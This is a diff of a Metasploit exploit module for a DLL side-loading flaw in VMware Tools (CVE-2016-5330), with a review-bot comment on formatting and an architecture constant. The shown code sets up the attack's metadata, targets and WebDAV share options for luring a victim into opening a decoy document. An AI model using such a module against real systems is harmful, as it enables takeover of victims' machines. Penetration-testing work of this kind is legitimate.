diff --git a/modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb b/modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb index 09934ae6eb..f35be546c2 100644 --- a/modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb +++ b/modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb @@ -1,4 +1,3 @@ -# Based on WebDAV Application DLL Hijacker module require 'msf/core' class MetasploitModule < Msf::Exploit::Remote @@ -9,8 +8,8 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector', - 'Description' => %q{ + 'Name' => 'DLL Side Loading Vulnerability in VMware Host Guest Client Redirector', + 'Description' => %q{ A DLL side loading vulnerability was found in the VMware Host Guest Client Redirector, a component of VMware Tools. This issue can be exploited by luring a victim into opening a document from the attacker's share. An attacker can exploit this issue to @@ -18,9 +17,9 @@ class MetasploitModule < Msf::Exploit::Remote result in the attacker taking complete control of the affected system. If the WebDAV Mini-Redirector is enabled, it is possible to exploit this issue over the internet. }, - 'Author' => 'Yorick Koster', - 'License' => MSF_LICENSE, - 'References' => + 'Author' => 'Yorick Koster', + 'License' => MSF_LICENSE, + 'References' => [ ['CVE', '2016-5330'], ['URL', 'https://securify.nl/advisory/SFY20151201/dll_side_loading_vulnerability_in_vmware_host_guest_client_redirector.html'], 
@@ -28,35 +27,33 @@ class MetasploitModule < Msf::Exploit::Remote ], 'DefaultOptions' => { - 'EXITFUNC' => 'thread', - 'PAYLOAD' => 'windows/exec', - 'CMD' => 'C:\\Windows\\System32\\calc.exe', + 'EXITFUNC' => 'thread' }, - 'Payload' => { 'Space' => 2048, }, - 'Platform' => 'win', - 'Targets' => + 'Payload' => { 'Space' => 2048, }, + 'Platform' => 'win', + 'Targets' => [ - [ 'Windows x64', {'Arch' => ARCH_X64,} ], - [ 'Windows x86', {'Arch' => ARCH_X86,} ], + [ 'Windows x64', {'Arch' => ARCH_X86_64,} ], + [ 'Windows x86', {'Arch' => ARCH_X86,} ] ], - 'Privileged' => false, + 'Privileged' => false, 'DisclosureDate' => 'Aug 5 2016', - 'DefaultTarget' => 0)) + 'DefaultTarget' => 0)) register_options( [ - OptPort.new('SRVPORT', [ true, "The daemon port to listen on (do not change)", 80 ]), - OptString.new('URIPATH', [ true, "The URI to use (do not change)", "/" ]), - OptString.new('BASENAME', [ true, "The base name for the docx file", "Document1" ]), - OptString.new('SHARENAME', [ true, "The name of the top-level share", "documents" ]), + OptPort.new('SRVPORT', [ true, "The daemon port to listen on (do not change)", 80 ]), + OptString.new('URIPATH', [ true, "The URI to use (do not change)", "/" ]), + OptString.new('BASENAME', [ true, "The base name for the docx file", "Document1" ]), + OptString.new('SHARENAME', [ true, "The name of the top-level share", "documents" ]) ], self.class) - deregister_options('SSL', 'SSLVersion', 'SSLCert') # no SSL + # no SSL + deregister_options('SSL', 'SSLVersion', 'SSLCert') end def on_request_uri(cli, request) - case request.method when 'OPTIONS' process_options(cli, request)
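Review bot: The trailing-comma cleanup in this hunk is only half applied: the list-ending commas were dropped after the last `Targets` entry and the last `OptString`, but the commas inside the hashes remain in `{'Arch' => ARCH_X86_64,}`, `{'Arch' => ARCH_X86,}` and `{ 'Space' => 2048, }`. Writing them as `{ 'Arch' => ARCH_X86_64 }`, `{ 'Arch' => ARCH_X86 }` and `{ 'Space' => 2048 }` would finish it. Separately, the x64 target switches from `ARCH_X64` to `ARCH_X86_64`, and the hunk does not show how either constant is defined, so confirm that the new one is the value the framework matches for 64-bit targets. The relocated `# no SSL` comment and the `(do not change)` option descriptions still give no reason for the restriction; a one-line why-comment above `deregister_options` would help maintainers. `initialize` starts above this hunk and `on_request_uri` continues below it.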